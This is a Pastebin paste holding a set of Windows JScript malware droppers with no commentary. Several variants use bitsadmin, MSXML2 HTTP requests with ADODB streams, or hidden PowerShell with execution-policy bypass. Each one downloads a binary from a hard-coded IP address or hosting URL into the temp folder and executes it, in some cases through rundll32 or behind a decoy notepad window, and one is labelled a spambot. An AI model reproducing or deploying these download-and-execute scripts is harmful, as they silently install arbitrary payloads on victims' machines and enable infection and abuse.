Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- bitsadmin_dll_100.js:
- var shell = new ActiveXObject("shell.application");shell.ShellExecute("cmd", "/c bitsadmin /transfer n http://178.33.182.145/dll/100.bin %TEMP%\\100.dll & rundll32 %TEMP%\\100.dll, DllRegisterServer", "", "open", 0);
- bitsadmin_exe_100.js:
- var shell = new ActiveXObject("shell.application");shell.ShellExecute("cmd", "/c bitsadmin /transfer n http://178.33.182.145/file/100.bin %TEMP%\\100.exe & %TEMP%\\100.exe", "", "open", 0);
- js_dll_100.js:
- var shell = new ActiveXObject("WScript.Shell");
- var path = shell.ExpandEnvironmentStrings("%TEMP%") + '\\' + Math.round(1000000 * Math.random()) + ".bin";
- var xmlhttp = new ActiveXObject("MSXML2.XMLHTTP");
- xmlhttp.onreadystatechange = function() {
- if (xmlhttp.readyState == 4 && xmlhttp.status == 200) {
- var stream = new ActiveXObject("ADODB.Stream");
- stream.open();
- stream.type = 1;
- stream.write(xmlhttp.ResponseBody);
- if (stream.size > 5000) {
- stream.position = 0;
- stream.saveToFile(path, 2);
- WScript.Sleep(2000);
- shell.Run("rundll32 " + path + ", DllRegisterServer", 1, 0);
- };
- stream.close();
- };
- };
- xmlhttp.open('POST', 'http://178.33.182.145/dll/100.bin', false);
- xmlhttp.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
- xmlhttp.send();
- js_exe_100.js:
- var shell = new ActiveXObject("WScript.Shell");
- var path = shell.ExpandEnvironmentStrings("%TEMP%") + '\\' + Math.round(1000000 * Math.random()) + ".exe";
- var xmlhttp = new ActiveXObject("MSXML2.XMLHTTP");
- xmlhttp.onreadystatechange = function() {
- if (xmlhttp.readyState == 4 && xmlhttp.status == 200) {
- var stream = new ActiveXObject("ADODB.Stream");
- stream.open();
- stream.type = 1;
- stream.write(xmlhttp.ResponseBody);
- if (stream.size > 5000) {
- stream.position = 0;
- stream.saveToFile(path, 2);
- WScript.Sleep(2000);
- shell.Run(path, 1, 0);
- };
- stream.close();
- };
- };
- xmlhttp.open('POST', 'http://178.33.182.145/file/100.bin', false);
- xmlhttp.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
- xmlhttp.send();
- js_exe_notepad_100.js:
- var shell = new ActiveXObject("WScript.Shell");
- var path = shell.ExpandEnvironmentStrings("%TEMP%") + '\\' + Math.round(1000000 * Math.random()) + ".exe";
- var xmlhttp = new ActiveXObject("MSXML2.XMLHTTP");
- xmlhttp.onreadystatechange = function() {
- if (xmlhttp.readyState == 4 && xmlhttp.status == 200) {
- var stream = new ActiveXObject("ADODB.Stream");
- stream.open();
- stream.type = 1;
- stream.write(xmlhttp.ResponseBody);
- if (stream.size > 5000) {
- stream.position = 0;
- stream.saveToFile(path, 2);
- WScript.Sleep(2000);
- shell.Run(path, 1, 0);
- };
- stream.close();
- };
- };
- xmlhttp.open('POST', 'http://178.33.182.145/file/100.bin', false);
- xmlhttp.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
- xmlhttp.send();
- shell.Run("notepad.exe", 1, 0);
- powershell_dll_100.js:
- var shell = new ActiveXObject("shell.application");
- shell.ShellExecute("cmd.exe", "/c powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.Webclient).DownloadFile('http://178.33.182.145/dll/100.bin','%TEMP%\\100.dll'); rundll32 '%TEMP%\\100.dll', DllRegisterServer", "", "open", 0);
- powershell_exe_100.js
- var shell = new ActiveXObject("shell.application");
- shell.ShellExecute("cmd.exe", "/c powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.Webclient).DownloadFile('http://178.33.182.145/file/100.bin','%TEMP%\\100.exe'); %TEMP%\\100.exe", "", "open", 0);
- js_spambot.js
- var shell = new ActiveXObject("WScript.Shell");
- var path = shell.ExpandEnvironmentStrings("%TEMP%") + '\\' + Math.round(1000000 * Math.random()) + ".exe";
- var xmlhttp = new ActiveXObject("MSXML2.XMLHTTP");
- xmlhttp.onreadystatechange = function() {
- if (xmlhttp.readyState == 4 && xmlhttp.status == 200) {
- var stream = new ActiveXObject("ADODB.Stream");
- stream.open();
- stream.type = 1;
- stream.write(xmlhttp.ResponseBody);
- if (stream.size > 5000) {
- stream.position = 0;
- stream.saveToFile(path, 2);
- WScript.Sleep(2000);
- shell.Run(path, 1, 0);
- };
- stream.close();
- };
- };
- xmlhttp.open('POST', 'http://51892372.de.strato-hosting.eu/cgi-data/1.exe', false);
- xmlhttp.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
- xmlhttp.send();
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement